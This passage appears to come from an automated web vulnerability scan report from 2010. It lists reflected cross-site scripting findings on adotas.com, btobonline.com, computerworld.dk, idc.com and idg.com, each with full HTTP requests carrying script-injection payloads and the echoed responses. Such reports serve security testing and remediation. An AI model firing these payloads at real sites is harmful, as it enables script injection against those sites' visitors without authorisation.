GET /2010/12/doubleverify-to-deliver-forward-is-with-verification4a532"><script>alert(1)</script>37045e53b7d/ HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmb=47048311; __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:26:21 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:26:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 61626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/2010/12/doubleverify-to-deliver-forward-is-with-verification4a532\"><script>alert(1)</script>37045e53b7d/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e98"><script>alert(1)</script>a5375d23475 was submitted in the REST URL parameter 1. This input was echoed as 47e98\"><script>alert(1)</script>a5375d23475 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /about47e98"><script>alert(1)</script>a5375d23475/ HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Referer: http://research.adotas.com/?option=com_categoryreport&task=viewabstract&pathway=no&autodn=1&title=11093&crv=9679&src=12&tgt=127&cmp=2748&yld=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=47048311; __utma=47048311.1018667347.1292504930.1292504930.1292504930.1
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:23:26 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:23:26 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 61461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/about47e98\"><script>alert(1)</script>a5375d23475/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88818"><script>alert(1)</script>193e7aea90 was submitted in the REST URL parameter 6. This input was echoed as 88818\"><script>alert(1)</script>193e7aea90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content/plugins/flash-album-gallery/admin/js88818"><script>alert(1)</script>193e7aea90/swfaddress.js HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:42:49 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:42:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61524
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content/plugins/flash-album-gallery/admin/js88818\"><script>alert(1)</script>193e7aea90/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2c4"><script>alert(1)</script>d9f3b9af84f was submitted in the REST URL parameter 6. This input was echoed as bb2c4\"><script>alert(1)</script>d9f3b9af84f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content/plugins/flash-album-gallery/admin/jsbb2c4"><script>alert(1)</script>d9f3b9af84f/swfobject.js HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:42:52 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:42:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content/plugins/flash-album-gallery/admin/jsbb2c4\"><script>alert(1)</script>d9f3b9af84f/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dddc"><script>alert(1)</script>149d3d7c9cc was submitted in the REST URL parameter 4. This input was echoed as 4dddc\"><script>alert(1)</script>149d3d7c9cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content/plugins/polls4dddc"><script>alert(1)</script>149d3d7c9cc/polls-css.css HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Referer: http://www.adotas.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:22:47 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:22:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 61527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content/plugins/polls4dddc\"><script>alert(1)</script>149d3d7c9cc/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee25a"><script>alert(1)</script>4e7de7a1730 was submitted in the REST URL parameter 4. This input was echoed as ee25a\"><script>alert(1)</script>4e7de7a1730 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content/plugins/pollsee25a"><script>alert(1)</script>4e7de7a1730/polls-js.php HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:38:18 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:38:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content/plugins/pollsee25a\"><script>alert(1)</script>4e7de7a1730/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c086"><script>alert(1)</script>6ad38bb8e36 was submitted in the REST URL parameter 1. This input was echoed as 8c086\"><script>alert(1)</script>6ad38bb8e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp8c086"><script>alert(1)</script>6ad38bb8e36/wp-content/wp-recommend/recommend.popup.php HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:38:12 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:38:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp8c086\"><script>alert(1)</script>6ad38bb8e36/wp-content/wp-recommend/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b60c"><script>alert(1)</script>bc83d14ec6a was submitted in the REST URL parameter 2. This input was echoed as 2b60c\"><script>alert(1)</script>bc83d14ec6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content2b60c"><script>alert(1)</script>bc83d14ec6a/wp-recommend/recommend.popup.php HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:38:22 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:38:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content2b60c\"><script>alert(1)</script>bc83d14ec6a/wp-recommend/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624c8"><script>alert(1)</script>639c973e5f2 was submitted in the REST URL parameter 3. This input was echoed as 624c8\"><script>alert(1)</script>639c973e5f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-content/wp-recommend624c8"><script>alert(1)</script>639c973e5f2/recommend.popup.php HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:38:37 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:38:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-content/wp-recommend624c8\"><script>alert(1)</script>639c973e5f2/?print_friendly=1"> ...[SNIP]...
2.306. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adotas.com
Path:
/wp/wp-content/wp-recommend/recommend.popup.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1d1"><script>alert(1)</script>0a945229459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp/wp-content/wp-recommend/recommend.popup.php/cd1d1"><script>alert(1)</script>0a945229459 HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:38:01 GMT Server: Apache X-Powered-By: PHP/5.2.10 Cache-Control: max-age=7200 Expires: Thu, 16 Dec 2010 15:38:01 GMT Content-Length: 2892 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c66e"><script>alert(1)</script>dc200739add was submitted in the REST URL parameter 3. This input was echoed as 2c66e\"><script>alert(1)</script>dc200739add in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp/wp-includes/js2c66e"><script>alert(1)</script>dc200739add/tw-sack.js HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:38:08 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:38:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp/wp-includes/js2c66e\"><script>alert(1)</script>dc200739add/?print_friendly=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d75c"><script>alert(1)</script>c59fc861253 was submitted in the REST URL parameter 1. This input was echoed as 5d75c\"><script>alert(1)</script>c59fc861253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /wp5d75c"><script>alert(1)</script>c59fc861253/xmlrpc.php HTTP/1.1 Host: www.adotas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:37:51 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:37:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... <a href="/wp5d75c\"><script>alert(1)</script>c59fc861253/?print_friendly=1"> ...[SNIP]...
2.309. http://www.btobonline.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.btobonline.com
Path:
/apps/pbcs.dll/article
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36017"><a>0070e0651e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /apps/pbcs.dll/article?36017"><a>0070e0651e1=1 HTTP/1.1 Host: www.btobonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=266300892.1292504932.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); stitialcookie=1; PBCSSESSIONID=473412229342877; did=j; OAX=rnneEk0KD3EAB0jq; __utma=266300892.1674254243.1292504932.1292504932.1292504932.1; CP=null*; __utmc=266300892; __utmb=266300892.4.10.1292504932; chkcookie=1292505027318; PBCSPERMUSERID=473412229342877;
Response
HTTP/1.0 200 OK Content-Length: 37310 Content-Type: text/html; charset=iso-8859-1 Last-Modified: Thu, 16 Dec 2010 13:37:28 GMT Server: Microsoft-IIS/7.0 X-Passed-To: S260608AT1VW221, URL Rewrite on site N/A (2010-12-16 08:37:28:132) X-Handled-By: S260608AT1VW221, Rewrite on site N/A X-Actual-URL: S260608AT1VW221, (/apps/pbcs.dll/article?36017"><a>0070e0651e1=1) X-Passed-To-DLL: S260608AT1VW221, (2010-12-16 08:37:28:132) X-Passed-To-BeforeDispatch: S260608AT1VW221, on site CT (2010-12-16 08:37:28:132) X-Returned-From-BeforeDispatch: S260608AT1VW221, on site CT (2010-12-16 08:37:28:147) X-Passed-To-PostProcessResponse: S260608AT1VW221, on site CT (2010-12-16 08:37:28:616) X-Returned-From-PostProcessResponse: S260608AT1VW221, on site CT (2010-12-16 08:37:28:616) X-Returned-From-DLL: S260608AT1VW221 (2010-12-16 08:37:28:616) X-Returned-From: S260608AT1VW221(2010-12-16 08:37:28:616) Date: Thu, 16 Dec 2010 13:37:27 GMT X-Cache: MISS from crsquid02 X-Cache-Lookup: MISS from crsquid02:80 Via: 1.0 crsquid02 (squid/3.0.STABLE18) Connection: close
<html> <head> <title>BtoB Magazine: Marketing News and Strategies for BtoB, Direct & Internet Marketing</title> <link rel="shortcut icon" href="/favicon.ico">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db257</script><script>alert(1)</script>3f8a39181ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /art/112943db257</script><script>alert(1)</script>3f8a39181ee HTTP/1.1 Host: www.computerworld.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.311. http://www.computerworld.dk/art/112943 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.computerworld.dk
Path:
/art/112943
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66293"-alert(1)-"0b7c71fbe95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /art/112943?66293"-alert(1)-"0b7c71fbe95=1 HTTP/1.1 Host: www.computerworld.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.312. http://www.idc.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idc.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c83c"><script>alert(1)</script>4bfa1b85fda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7c83c"><script>alert(1)</script>4bfa1b85fda=1 HTTP/1.1 Host: www.idc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6E1B5E28D57716E9F44CCE1B6AB4D809; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Thu, 16 Dec 2010 13:22:46 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 49728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>IDC Home: The premier global market intelligence firm.</title>
<!--The below meta tag was ...[SNIP]... <a href="/action/login.do?successUrl=/?7c83c"><script>alert(1)</script>4bfa1b85fda=1"> ...[SNIP]...
2.313. http://www.idg.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7742"-alert(1)-"4b74e385f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d7742"-alert(1)-"4b74e385f1e=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:24:07 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?d7742"-alert(1)-"4b74e385f1e=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 788d4"%3b3db035d407f was submitted in the REST URL parameter 1. This input was echoed as 788d4";3db035d407f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www788d4"%3b3db035d407f/HomeNew.nsf/docs/U.S._Sales HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:24:03 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www788d4";3db035d407f/HomeNew.nsf/docs/U.S._Sales"); } catch(err) {}</script> ...[SNIP]...
